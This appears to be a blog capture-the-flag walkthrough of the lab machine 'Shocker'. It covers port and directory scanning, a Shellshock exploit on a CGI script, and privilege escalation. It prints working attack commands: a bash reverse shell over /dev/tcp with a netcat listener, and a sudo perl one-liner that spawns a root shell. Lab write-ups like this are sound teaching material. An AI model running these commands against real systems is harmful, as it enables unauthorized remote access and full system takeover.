• Target:
  • Goal: Root access

Port Scanning

nmap -p- -A
port scanning
  • Port 80/tcp: Apache httpd 2.4.18
  • Port 2222/tcp: SSH (OpenSSH 7.2p2 Ubuntu 4ubuntu2.2)


Let’s look at the website:


Only an image. There’s no other information or links. Let’s use gobuster to see any hidden files or directories:

gobuster -u -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp"
gobuster initial scan

The /cgi-bin looks interesting. While it’s permission denied, files within the directory maybe accessible. Let’s do another gobuster scan on /cgi-bin.

gobuster -u -x sh,pl -w /usr/share/wordlists/dirb/common.txt
cgi-bin scan

Found file user.sh inside /cgi-bin directory. Let’s check out the file. Browsing the file resulted in downloading a plain text file:

 Content-Type: text/plain
 Just an uptime test script
  09:51:31 up  1:45,  0 users,  load average: 0.00, 0.00, 0.00 

There really has nothing on the website other than this user.sh shell script. Let’s test if it is vulnerable to Shellshock using nmap script engine.

nmap -p80 -sV --script http-shellshock --script-args "uri=/cgi-bin/user.sh"

Looking good. It’s vulnerable to Shellshock.


I am using bash reverse shell to try to get shell access. First start a Netcat listener at port 4444 at kali box:

nc -lp 4444

Then use the following bash reverse shell command and use in the Shellshock exploit:

/bin/bash -i >& /dev/tcp/ 0>&1
shellshock exploit
limited shell

Obtained limited shell as shelly.

Privilege Escalation

sudo -l

It shows that shelly can run perl as root. That makes privilege escalation pretty straight forward:

sudo perl -e 'exec("/bin/bash")'
root access

Root access obtained.

Capture the Flag

Simply go to /home/shelly/user.txt and /root/root.txt to capture the flags.

Thank you author mrb3n for the box Shocker.

Leave a Reply

Close Menu